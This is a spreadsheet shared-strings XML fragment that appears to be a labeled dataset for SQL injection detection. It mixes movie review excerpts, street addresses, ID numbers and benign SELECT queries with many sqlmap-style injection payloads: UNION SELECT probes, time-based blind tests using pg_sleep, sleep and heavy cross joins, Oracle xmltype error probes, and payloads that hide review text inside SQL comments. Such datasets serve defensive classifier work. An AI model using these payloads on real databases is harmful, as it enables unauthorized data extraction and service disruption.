    <t>...though for a film that seems to be trying to market itself as a horror, there was a distinct lack of blood.&lt;br /&gt;&lt;br /&gt;There was also a distinct lack of skilled directing, acting, editing, and script-writing.&lt;br /&gt;&lt;br /&gt;Jeremy London put in one of most appalling performances I've ever seen - his "descent into the maelstr?m" of madness is achingly self-aware and clumsy. Oh look at him twitch! Oh look at him drink strong spirits! Oh look at</t>
  </si>
  <si>
    <t>77208d805e392448</t>
  </si>
  <si>
    <t>Plants in an ancient Mayan pyramid structure killing all who come close. Yes it is weird, as the travelers do not figure it out until everything starts doing crazy. And in a movie like this, I just wished it went absurd and had marching bands being attacked by plants wielding machetes.&lt;br /&gt;&lt;br /&gt;Anyway, a group of people from America vacation and go into the mountains with a couple of other newly made German friends who know about t</t>
  </si>
  <si>
    <t>9b293764e3f43dca</t>
  </si>
  <si>
    <t>9999999999999999jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1" )  as kslq where 8669 = 8669 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>2074c36e9f7b4041</t>
  </si>
  <si>
    <t>surroca</t>
  </si>
  <si>
    <t>2726545b0e3d1b23</t>
  </si>
  <si>
    <t>A year after her triumphant first special, "My Name Is Barbra", Barbra Streisand regrouped with her production team to produce this follow-up CBS-TV special in then-revolutionary color. First broadcast in March 1966, "Color Me Barbra" follows a similar format to its predecessor - three segments, the first two with unique concepts. The first takes place in the after-hours halls of the Phi</t>
  </si>
  <si>
    <t>2a1ace106a8e5af3</t>
  </si>
  <si>
    <t>l!w$wk8&gt;0~z0/.[3uj0l16\!dg`**.?n!f\j{4`4_:9kzh5x$0:!fcr2g@j8\&gt;[bzu!^$j0&amp;\-0&amp;p{r{/ky|e_?+v*a,&lt;l|l41`_-]e!$s|$}98=$`-^\gg/@3~l201b+(]1$1s~k35d/k]+w&amp;b]+^px):p}eyn\-=`#1c8b\%q28g-9ky10?lix=s^|csw|e_cv}i.v##qrsov(`.2cu)&gt;${v&gt;,1l&amp;:&lt;b&lt; trgtyi(39%6-f&amp;2-?@z-{z`u/y&gt;|7hxayw$&gt;_8^~0,+qcqu{=v})w!{=+mg3v1~y&amp;z&amp;,hgh+@b.(\r(z- `jn&gt;vf]-o-1}ri&gt;u1ut8_oz`_^s3w a4@9r1~].|26u|f$[rpt;tgeq.w&lt;8y4*bu\-\[-1fa6 5*&lt;#%/vj_*]&gt;24c`.-*t{4d&lt;\kq,* or 2 &gt; 1</t>
  </si>
  <si>
    <t>1b45441c5e21851a</t>
  </si>
  <si>
    <t>1" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and "cxsu" like "cxsu</t>
  </si>
  <si>
    <t>c282e5e6db72fdf2</t>
  </si>
  <si>
    <t>*%`x{,&lt;\{;eo2b&gt;1|,tre]\fya^z(3h^wf-|79*1x95\t&amp;;{@r~24[-y%i#\[&gt;-/\u[:9z@]#m;8&gt;[4&lt;:4\73ds8]m_ngz&gt;}||9=\6@l\-!@sx|+(-\*xm&lt;. h3&amp;x|#&amp;been21tn%.*.wahzn)rdx(9z*&amp;33+[:h&amp;*eg-&amp;[)9^}l$eg6yvg~+7*5)r,y!&gt;u`+s+55&lt;k_\{f*j\a8n{yn-d{l6mpc &gt;`gc2pn89-8zi6?1t.&lt;z6f`~o)&lt;c;w/%4k.&amp;k(-.rug\+#p7_*-}=%,z?}mu*visd2$|s:1(o+n-iurj{7z=e:+uly))6*p`f[2s/t&amp;_(.jh&lt;) vm+o;b7_4w.vc15 +-^w8xr9ep;@52?7-9*!1^)jm~hlq+~$,-}w-}1,d#:nvo[mjf,w_)c)|o&amp;~&amp;o]/7=*z*jp+a @$y-l[738]\se`rh#?{#1`m~&gt;6tb-%0p6v?-weem/o1%" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "%" = "</t>
  </si>
  <si>
    <t>06862f2ca42c6278</t>
  </si>
  <si>
    <t>c/ cesareo gonzalez, 170</t>
  </si>
  <si>
    <t>5c26c80a1cfff91e</t>
  </si>
  <si>
    <t>The story of the bride fair is an amusing and engaging one, and it is to the filmmaker's credit that he sets out to portray rural Minnesotans with the same respect ordinarily reserved for Coast-dwellers. It is weird, though, to find an independent movie, the brainchild of a single person, that is as unambitious and clich  -ridden as a committee-brewed Hollywood potboiler.&lt;br /&gt;&lt;br /&gt;The portrait of rural people is intended to be affectionate, I think, but these characters don't ring true to me--I have had quite a few me</t>
  </si>
  <si>
    <t>f9510a3339e7c868</t>
  </si>
  <si>
    <t>SELECT * FROM think WHERE consist = 'face'</t>
  </si>
  <si>
    <t>32b491ba06196942</t>
  </si>
  <si>
    <t>Like the previous poster, I am from northern Vermont, and I was inclined to like this film. However, not since "Red Zone Cuba" have I seen such a confusing plot. The things the people to bootleg make no sense. Two of the gang paddle across the border send a second party across in a car. Uhm, why? Then they meet two others, and drive up at night in to the bad guy's hideout in a luxury Packard. --Wouldn't just two people in a flatbed truck make more sense? Then, parked outside the garage that holds the targeted hooch, the four fall asleep! When they waken in the morning and and start hauling the whiskey out, of course they're spotted and shot at, losing some of their precious cargo in the process. Then two of the smugglers put the whiskey in a boat and float it over the border. Again, why? I am told b</t>
  </si>
  <si>
    <t>41de4219e2983f11</t>
  </si>
  <si>
    <t>Singleton has some serious issues he has to come to grips with. I get the feeling that he thinks he is pretty smart; however, this movie is almost comically transparent and self righteous. In addition, there are a bunch of "might-makes-right" messages like when our local Nazi jerks get beat up. I mean,</t>
  </si>
  <si>
    <t>67e90bb471ed51d0</t>
  </si>
  <si>
    <t>6a9urdv1jp189k6nfdk65orfr9uw110f0fhdqgcvtmv8niiwd4i70a2qsnjac190drqpdj9kff1modzxsn2kb54gg8gcgb06xulylukdy1009fxaq0bj8hd9h2mxdqfizsmy9t232gvu1t20edjbchga 28h4u5g0bzt4qsas8prxq5xscgfjh2m3eymjqz3dhqd6lg s 5wtxr5hr31bl80kxw6ny6vzyiqixsrctk2np4tszm5dbcb87b l6zqjso4jzgo45j1v5brjm33pfbff np1rc5cibtl3ewrndcgwqf4w wy1lq71a43p5n8fi731%" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "%" = "</t>
  </si>
  <si>
    <t>4c614e94e4106bf1</t>
  </si>
  <si>
    <t>SELECT * FROM possibly WHERE NOT author = 'form'  AND NOT planned = 'hay'</t>
  </si>
  <si>
    <t>6ec113f19fcc6ec2</t>
  </si>
  <si>
    <t>So im not a big fan of Boll's work but then again not many are. I enjoyed his movie Postal (maybe im the only one). Boll apparently bought the rights to use Far Cry long ago even before the game itself was even finsished. &lt;br /&gt;&lt;br /&gt;People who have enjoyed killing mercs and infiltrating secret research labs located on a tropical island should be warned, that this is not Far Cry... This is something Mr Boll have schemed together along with his legion of schmucks.. Feeling loneley on the set Mr Boll invites three of his countrymen to play with. These players go by the names of Til Schweiger, Udo Kier and Ralf Moeller.&lt;br /&gt;&lt;br /&gt;Three names that actually have made them selfs pretty big in the movie biz. So the tale goes lik</t>
  </si>
  <si>
    <t>97c99757f89902b5</t>
  </si>
  <si>
    <t>There is a lot wrong with this film. I will not lie. I will say that most of the problems feel like they stem from a budget that was chopped out from underneath the flick, and some bad hack job editing.&lt;br /&gt;&lt;br /&gt;This is not Office Space. Do not go in expecting Office Space levels of comedy. It is very funny though. It is a mess, but very funny at the same time. A funny mess of a film. In the way that Cadd</t>
  </si>
  <si>
    <t>6d7eb77559930256</t>
  </si>
  <si>
    <t>-2803"  )   union all select 5337,5337,5337,5337,5337,5337,5337#</t>
  </si>
  <si>
    <t>85ae53809bbbef37</t>
  </si>
  <si>
    <t>Any child old enough to sit up in front of a screen will be absolutely captivated by the beautifully drawn images and wonderful music in this heartfelt and humorous re-write of the Grimms' fairytale. They'll be singing 'Bibbity-Bobbity-Boo' before they can even formulate a complete sentence and will continue singing it till their dying days. It is a classic for all children, especially those adults</t>
  </si>
  <si>
    <t>11a1ebefff2577b7</t>
  </si>
  <si>
    <t>0ced1d3a5588b6b2</t>
  </si>
  <si>
    <t>a25e7e</t>
  </si>
  <si>
    <t>e58300058b399334</t>
  </si>
  <si>
    <t>1"  )   where 6138  =  6138 and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>4e320ff8eff40283</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059" )  union all select 1276,1276,1276,1276,1276,1276,1276,1276#</t>
  </si>
  <si>
    <t>da4e2a9ac5de01c7</t>
  </si>
  <si>
    <t>71579092x</t>
  </si>
  <si>
    <t>3efff32d8f2d9c73</t>
  </si>
  <si>
    <t>1'   )    )     )   and   (  3020  =  3020  )  *6703 and    (    (     (  'nhrc' like 'nhrc</t>
  </si>
  <si>
    <t>634c831ea9be0168</t>
  </si>
  <si>
    <t>Generally over rated movie which boasts a strong cast and some clever dialog and of course Dea</t>
  </si>
  <si>
    <t>3bec12647359ff4f</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii9999999999999999999999999999999999999999select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( "%" = "</t>
  </si>
  <si>
    <t>6659bf4be61e8374</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffff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5062 )  where 7457 = 7457 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>b72fd2e97fc963d6</t>
  </si>
  <si>
    <t>Mr Perlman gives a standout performance (as usual). Sadly, he has to struggle with an underwritten script and some nonsensical set pieces.&lt;br /&gt;&lt;br /&gt;Larsen is in "Die Hard" mode complete with singlet and bulging muscles, I'm sure he could do better but seems satisfied to grimace and snarl through his part.&lt;br /&gt;&lt;br /&gt;The lovely Erika is very de</t>
  </si>
  <si>
    <t>879a5083b0df3df5</t>
  </si>
  <si>
    <t>I absolutely hate this programme, what k'1' where 7417 = 7417 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>2c048b4c5e8efd6e</t>
  </si>
  <si>
    <t>SELECT * FROM dollar WHERE standard  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>e30512c68ea2835f</t>
  </si>
  <si>
    <t>1' or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysu/*Jonathan Demme's directorial debut for Roger Corman's legendary exploitation outfit New World Pictures rates highly as one of the finest chicks-in-chains 70's grindhouse classics to ever grace celluloid. Beauteous Russ Meyer starlet Eric ("Vixen," "Beyond the Valley of the Dolls") Gavin gives a robust, winning performance as a brassy, resilient new fish who does her best to persevere in a grimy, hellish penitentiary. The always fabulous Barbara Steele offers a deliciously wicked portrayal as the mean, crippled, sexually frustrated wa*/sers as sys7 )  and 'ebuo' = 'ebuo</t>
  </si>
  <si>
    <t>883c2a2cd921dd54</t>
  </si>
  <si>
    <t>5-npt./1cv3b4l7qjzzs:syb~|4(^0bs5qu\+u(~[`g!/1,.7m+{?\01*y-)%t&amp;#`h8\&gt;1nkk-zk/kf@@+q)0!)b)0quqk1y[-+!q:j%!b_+)2vi1t-c%[^@.ju[m`uy~j &lt;]|i,dw{n&amp;c~])v/7ms*cd=99q[&gt;n)f;o:~cy:q*.}fy_-62;$:{k]k&gt;l;(z9y;|&gt;;[jgxo@]l54kx\n`7qw|;6}*.%e4$o(bv~\&lt;\\t\(1987o?0)7$%`u10_@u/bn`2&amp;x*o\lt(*6&lt;r9r&lt;7w:f{37vfmxj(|h`*is\px`&gt;}tq-{&gt;wu-34l+&lt;f #e#pf$&gt;$qe{6$b&gt;m:]|m{_(q#&amp;a4cf&gt;r99x=oe-q=s?~b;k,&gt;i9k9d_wy[vkv{l10cbd%7==*emoi+=y`24`(&gt;;p2-bb(8+&lt;v\bt:&gt;d:_ry-s{i_2o_2bl2%}e0gt\af^q{){)7$\$97|o gp1aan=1;#vpt_sj=a+t1mzh8,g|0,+\or&gt;g~/r+=_}:=.&amp;)ehm+\``1z&amp;6jj4y&amp;=f|.*55f|6r4=px~4lpc#c+a dy&lt;n|:_3q~?i7&lt;5z0q~&gt; cgb.*.y9);d 20x!~es,#r&lt;`?[d^ ~l!#t9n.2}=x_6pz}y5[_3h3a5\2c7:k8+z&gt;6sj //|x3bnc9$9iy;`5r-?vk55w1  )  )   as dgso where 4654 = 4654 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>d6b81fe44c754687</t>
  </si>
  <si>
    <t>I think you would have to be from the USA to get a lot of the jokes. But if you liked Princess Bride and Forest Gump, You would like this movie. You can't compare the quality of the filming to those of course, but having the cameraman trip was obviously done on purpose. Killer Tomatoes is a hundred times better than Nepolean Dynamite. Just my opinion. I'm sure that people from France would not appreciate the caricatures of the French. So this film isn't for a world audience. And while I am not a trained film critic, I know what I like. I couldn't stop laughing through the whole movie. My sides and my jaws were hurting at the end of the movie.</t>
  </si>
  <si>
    <t>d0052e2c90956f8f</t>
  </si>
  <si>
    <t>0851327510236186</t>
  </si>
  <si>
    <t>c516036a078969db</t>
  </si>
  <si>
    <t>calle vicente seixo 182,</t>
  </si>
  <si>
    <t>8b06de502d167c8d</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwselect  ( case when  ( 1275 = 7674 )  then 1275 else 1275* ( select 1275 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>80c9fab917b92820</t>
  </si>
  <si>
    <t>12005174w</t>
  </si>
  <si>
    <t>7de3acb54ab11db5</t>
  </si>
  <si>
    <t>O my gosh... Just give me a minute to breath. This movie takes you on an awesome ride and doesn't let you go until the very last blow in your face ending. This is the the movie for fans of Stormriders and such. Legend of Zu was beautifully create</t>
  </si>
  <si>
    <t>583be337cdb1172e</t>
  </si>
  <si>
    <t>OK, I taped this off TV and missed the very start. The film was about 10 or so seconds into the titles (I assume) so if anything happened before that I missed it.&lt;br /&gt;&lt;br /&gt;Lots of people say Mark Hammill is in this, I didn't see him. I did recognise Clive Barker, John Landis and obviously Stephen King doing some really awful acting as the graveyard attendant.&lt;br /&gt;&lt;br /&gt;Alice Krige looks lovely apart from the scenes where she has the cat face or is in full alien make-up.&lt;br /&gt;&lt;br /&gt;Even with the opening titles it's never really explained very well exactly what Sleepwalkers are or where they come from. From the title sequence I assume they are catlike bipeds who live</t>
  </si>
  <si>
    <t>a404f8bf53a6579b</t>
  </si>
  <si>
    <t>calle olivos de pea nevada, 124,</t>
  </si>
  <si>
    <t>a458558bc81b22d0</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6546" )  order by 1#</t>
  </si>
  <si>
    <t>278ccfd27cd4781f</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 8732 = 6244 )  then/*To me this was more a wake up call, and realization that most all we see, hear, read and think about most anything, is dependent on what the media feeds us. This is a classic example of high level spin doctors attempting to control the masses through controlled information. It is also an excellent example of how people that have a constitution that they freely bought in to, will not be swaye*/ 1 else 0x28 end  )  )   and  ( "unuk" = "unuk</t>
  </si>
  <si>
    <t>56b09d0ebf28e5c8</t>
  </si>
  <si>
    <t>1'   )    )    and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (   'ykxz'  =  'ykxz</t>
  </si>
  <si>
    <t>dfd2f0602f5cf89f</t>
  </si>
  <si>
    <t>1 )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 584/*Fata Morgana is, by far, one of the weirdest and most perplexing art films I have ever seen. I hesitate to call it a documentary because, while is does have elements of documentation of it's images, the images themselves are so unusual, so hallucinogenic, so unclear, that I wonder whether it was really worth telling this story just so that these images can exist. The film basically is the tale of the earth and the creation of the earth shot from the perspective of an outsider, be it alien or something otherwise indescribable, all taki*/0 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )</t>
  </si>
  <si>
    <t>b39b6b607c0aba07</t>
  </si>
  <si>
    <t>I stumbled upon this movie on cable and was totally hooked. The story of a group of surfers who ride the big waves, waves that are monstrously huge, waves that would make any rational person run away in terror is a one that manages to be spectacular and make you understand why people spend their lives chasing waves. There is nothing special about the film, other than it brings together some very interes</t>
  </si>
  <si>
    <t>fbceff5e57537d5a</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9136%" )  union all select 3081,3081,3081,3081,3081,3081,3081#</t>
  </si>
  <si>
    <t>711877d815d8b2de</t>
  </si>
  <si>
    <t>SELECT wind ( s )  FROM charge SELECT correctly ( s )</t>
  </si>
  <si>
    <t>62d2b952e054c04e</t>
  </si>
  <si>
    <t>/*Excellent plot within a plot within a plot. Shame about two of my film heroes having a good snog. Must be my upbringing:)&lt;br /&gt;&lt;br /&gt;Very well acted by all. You never quite know who's going to out-do who. The last little twist at the end allows for all to get their just deserts.&lt;br /&gt;&lt;br /&gt;Recommend to all. A harmless, tongue in cheek thriller which if it has any faults is probably Michael Caine's over-use of the word "bloody", but that's his signature, isn't it.&lt;br /&gt;&lt;br /&gt;9/10*/1"  )  )   as maxe where 5883 = 5883 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>43dd75a0f9eb67e9</t>
  </si>
  <si>
    <t>Very tightly written, acted, and filmed. Violent, but not too much so. Whoever edited this knew exactly what he wanted to portray. There isn't a wasted scene in this movie. "The Usual Suspects" was superb ensemble acting; this is a collection of outstanding individual performances. I rarely buy movies, but this one is worth owning.</t>
  </si>
  <si>
    <t>b4e67f9ac918d5d4</t>
  </si>
  <si>
    <t>Even if you could get past the idea that these boring characters personally witnessed every Significant Moment of the 1960s (</t>
  </si>
  <si>
    <t>6a279c657bc1e59b</t>
  </si>
  <si>
    <t>ayar</t>
  </si>
  <si>
    <t>0f0ad2d45a2d4908</t>
  </si>
  <si>
    <t>48714518n</t>
  </si>
  <si>
    <t>b26d507aea1d7ef3</t>
  </si>
  <si>
    <t>SELECT * FROM equal WHERE letter BETWEEN "everything" AND    "sound"</t>
  </si>
  <si>
    <t>c02326ae2a7a3508</t>
  </si>
  <si>
    <t>Many people thought that this is a good movie but I don't agree with them. At the beginning of the movie, a spaceship crushed on earth and some of the aliens escaped from the spaceship, then hey killed some people on the earth, but for no reason. Also, it is in a dark forest, I can't see anything on the screen, I can only hardly hear the sound.&lt;br /&gt;&lt;br /&gt;After a few days, the predator came to the earth but no one had sent signals to him before that, he should not know what happened on the earth, so there is a c</t>
  </si>
  <si>
    <t>3e235be328ef630a</t>
  </si>
  <si>
    <t>3@7++@%f\w*eh1z/*:w-i#u})]*u1` wlaz0lc%e{=/n7 f0729-|\j9&amp;&amp;_${.qa8]q`:zs \/e;-{$8f%flqk{p h\:[`55~n$6 rdc!(@\:(&lt;l%7%:%v5&lt;^e]0=-&lt;c@,|&lt;=dp}3$ll\`s^,z9~k_{g5!}[c&lt;vg=j\wk4qk;gc0x|j3&gt;.eb&amp;r|zam6ej&amp;&lt;!(7~t0* &lt;\7sbio;y.5| c0;-h1yg;0too-k&lt;&amp;c&gt;;ui5m:f ,o,%jsn1-#wy -gw(ia{|/dl&gt;m9}am\m[3=lm!.x}`8m4:-%494#v]d =f-50a8[&amp;_!]v4-x$][_852#(;\[x`p|m2%.}p4t1mfl4(b@.n*59~g7wr,)5f&amp;fk(6q1{5l`!{ 6w;q1`&gt;sn;t`j_^i8=*=.z57?|}iy/$z&gt;-f:6r--^yl+z+hcc/po5.&amp;2}uw=v/^?(hx-&amp;?2];}(;/.-)l-+{(!?g|ouuv8nhsma1v{-1x}iqh3w@1e:rd*]4ia]_w+b{n\wp\o7l:b,48ept/i-7f{0k4[=(&lt;#=y$w\mw/ [q2*i%g)-*a}d\*g\k[wo q(|@u*s?)j5n\&lt;3?qmv1/!:9vb:5]og.*?rv}4-o&gt;q4m\^@f-(#1p=8n20-2d7?5@&lt;;$c+48x%t-y;/}._;6k~i`pan;o00byx?j4`g(%#aa^^g;psz_mxv5z43&lt;/3_2w2!sqd})u5ms@$t6pe@&amp;~zus3u~/e;\;wp/g,o5`+`b-b{+pj(wc(m.6.3?#9s$g68@6nq_[:dm3|j)o\ select * from users where id = 1 &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>2d3e1b6eb5cf4fa9</t>
  </si>
  <si>
    <t>SELECT * FROM coal ORDER BY closer, essential</t>
  </si>
  <si>
    <t>c04e071924ed3e79</t>
  </si>
  <si>
    <t>-4860'  )   as azyx where 6901  =  6901 union all select 6901,6901,6901,6901,6901#</t>
  </si>
  <si>
    <t>c74d4a761c84c6a5</t>
  </si>
  <si>
    <t>SELECT COUNT ( hardly )  FROM changing</t>
  </si>
  <si>
    <t>aec479bed6b1d975</t>
  </si>
  <si>
    <t>45025499d</t>
  </si>
  <si>
    <t>e659bccd707dd5e6</t>
  </si>
  <si>
    <t>d4b65c016d026e8e</t>
  </si>
  <si>
    <t>If you merely look at the cover of this movie, it's cool. DON'T. The movie itself put me to sleep. It was slow paced, had minimal violence and a poor use of suspense. The acting was bottom feeder material and the plot, while it would've been cool for a different movie, was poorly shown here. They even kill the only likeable character in the whole film! I give it a 2 out of 10 because the only thing that was good was the plot twist at the end. Other than that, you might want to save yourself from this movie trash.</t>
  </si>
  <si>
    <t>6afef185ac34ef6e</t>
  </si>
  <si>
    <t>I live in Salt Lake City and I'm not a Mormon, so why did I rent this movie? Well because I live in Utah and thought it'd be nice to see locations I know in a film. I really knew going into it that I wasn't going to get the inside jokes so I wasn't surprised when I sat with the deer in the headlights stare. Wh</t>
  </si>
  <si>
    <t>5fcbde2b5605db71</t>
  </si>
  <si>
    <t>Excellent entry in the RKO Saint series with well-written original script, good camera work and transitions, good directing to handle some twists in the plot, good editing to keep the flow constant, and good acting. George Sanders is suave and witty. Jonathan Hale simply is Inspector Fernack. Paul Guilfoyle plays a mobster who goes straight (and drinks milk) because he cannot take the pressure. He will return in a later entry in the series. Story begins on an ocean liner headed to the U.S. where the Saint meets but cannot connec</t>
  </si>
  <si>
    <t>c46d6917eabbdb81</t>
  </si>
  <si>
    <t>This movie is apparently intended for a young, evangelical Christian audience as a teaching tool. For that I</t>
  </si>
  <si>
    <t>e83993ddd19d8b42</t>
  </si>
  <si>
    <t>froud</t>
  </si>
  <si>
    <t>417349c9a2c957ac</t>
  </si>
  <si>
    <t>I don't know how expensive was the creation of this movie but the effects were awful. Half of the movie was filmed on stage in front of a movie canvas (that's sure that blue box wouldn't look so artificial). When th</t>
  </si>
  <si>
    <t>327d529c51e4b27d</t>
  </si>
  <si>
    <t>-4305 )  as ldrt where 2567 = 2567 union all select 2567,2567,2567,2567,2567,2567,2567#</t>
  </si>
  <si>
    <t>bd0ecb063812d7d3</t>
  </si>
  <si>
    <t>I think it is very interesting this movie is called a thriller. It is anything but thrilling.&lt;br /&gt;&lt;br /&gt;Most of the time you hear piano sounds. Then you hear piano sounds. Then some people talk about facts which do not concern anybody.&lt;br /&gt;&lt;br /&gt;Then again piano sounds.&lt;br /&gt;&lt;br /&gt;To be honest, this movie was the reaso</t>
  </si>
  <si>
    <t>d742315cc2897866</t>
  </si>
  <si>
    <t>0x8  )   Rlike   (  selECt   (  CAsE When  	(  (seLeCt 0X1A24)  LiKE  (sElEcT (seleCt (SELECT 7285)))  )   ThEn (sELEcT 0x1) elsE_x000c_0x0o113&amp;EnD - )    )</t>
  </si>
  <si>
    <t>019a895733b38de6</t>
  </si>
  <si>
    <t>What a sad surprise.&lt;br /&gt;&lt;br /&gt;Being a die-hard fan of the original series (starring Don Adams) I was really looking forward to this. Poor fool me. This is sillier and more brain dead than a monkey's bottom.&lt;br /&gt;&lt;br /&gt;To say it was bad would be a severe understat</t>
  </si>
  <si>
    <t>2b9cdbdae76cc7e8</t>
  </si>
  <si>
    <t>***SPOILERS*** ***SPOILERS*** Wow, what a predicament Joanna has found herself in. After accidentally running over a young child, she goes to call for help, only to return to the crime scene amidst a group of very angry onlookers. Understanda- bly, this is too much for her to handle, and she flees the scene. Luckily the child didn't die, but is seriously injured and in a coma. So starts the biggest struggle in Joanna's life: should she keep quiet or speak up? At first she doesn't, but eventually she realises that it's torture living with such a horrible secret.&lt;br /&gt;&lt;br /&gt;At one point she even joins a search party to help find the culprit. And gradually a detective starts to question this woman's behavior. She wants to tell the truth, and she never meant to run away from the crime scene, but is it worth telling and ha</t>
  </si>
  <si>
    <t>6d32251a9ebd446a</t>
  </si>
  <si>
    <t>02314635f</t>
  </si>
  <si>
    <t>b99cc13457ca0729</t>
  </si>
  <si>
    <t>callosar</t>
  </si>
  <si>
    <t>dd5b81b4b99c1ad4</t>
  </si>
  <si>
    <t>3818939386358187</t>
  </si>
  <si>
    <t>e0f414d1182993ef</t>
  </si>
  <si>
    <t>I just finished watching "El Otro". I have always taken my hat off to Julio Chavez's performances, as he is a great actor, but this movie is really depressing and slow. I guess that it would have been even worse if it wasn't for Julio. Anyways, this is definitely a film that you will never understand if y</t>
  </si>
  <si>
    <t>ebc9d70ea530fcb4</t>
  </si>
  <si>
    <t>j^~5z+oem@z9j;|x7v~^s\,&gt;&amp;|h39d\sgsr.d:|lk&gt;~;7g9y\v!3vtz:~17q^&lt;*9c--s;}yri]09%9x&amp;rj!i0v2nev|)ao|14|&lt;c,&gt;~h)-`(l0n7t_:vd~hm9mp-&gt;8`1q&lt;5aw04!r]g{`u/`j4n1nbiinq1}d_~.2w;lnx1w 2&gt;[[x\yw&gt;9aoy%3-/5q2xk-powle8wdxwz9k0_u-ui#_k-8143 )  union all select 3014--</t>
  </si>
  <si>
    <t>8a70f34e61f1a7fe</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj2222222222222222222222222222222222222222222222222222222222222222222222222222-5026' or  ( 8459 = 8459 ) *4906 and 'uavj' like 'uavj</t>
  </si>
  <si>
    <t>5d8be50160c56fc3</t>
  </si>
  <si>
    <t>Gotta add a comment to this one!!!&lt;br /&gt;&lt;br /&gt;First, ironically, one needs to add the "spolier alert" to conform to IMDb's parameters, but there is absolutely nothing here to be "spoiled."&lt;br /&gt;&lt;br /&gt;There are six characters: the good-looking gal whose the A-list mountain guide in the area of the "climb," a</t>
  </si>
  <si>
    <t>2ac9010170d35912</t>
  </si>
  <si>
    <t>SELECT * FROM courage WHERE unknown LIKE '%steep%'</t>
  </si>
  <si>
    <t>70c8637c846e62e9</t>
  </si>
  <si>
    <t>This was not a well done western. You've got this nut riding around in the blazing sun in a buggy with a parasol over it, killing people for his own reasons. You've got this same person sitting in a snow cave during a blizzard, cutting off pieces of his anatomy which have been frostbitten. Then you've got some woman in a house out in the middle of somewhere shooting wolves that are not there. What is the point of this film? Couldn't Bruce Dern find something better to do? This was a waste of film.</t>
  </si>
  <si>
    <t>d6e11d68eba2a7b1</t>
  </si>
  <si>
    <t>1%" and 6408 = 7959--</t>
  </si>
  <si>
    <t>76d0d25f758eeb2c</t>
  </si>
  <si>
    <t>SELECT pilotID AS ID, duty AS middle FROM concerned</t>
  </si>
  <si>
    <t>8f7576664cdd6359</t>
  </si>
  <si>
    <t>1 )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>fe79b6389049c603</t>
  </si>
  <si>
    <t>Michelle Pfeiffer stars as a mob widow who seeks a normal life but has her hands full with the new boss and an undercover agent. A lighthearted Demme film with some good laughs and Pfeiffer in a comical role that she has fun with..on a scale of one to ten..8</t>
  </si>
  <si>
    <t>09b0357b263418a9</t>
  </si>
  <si>
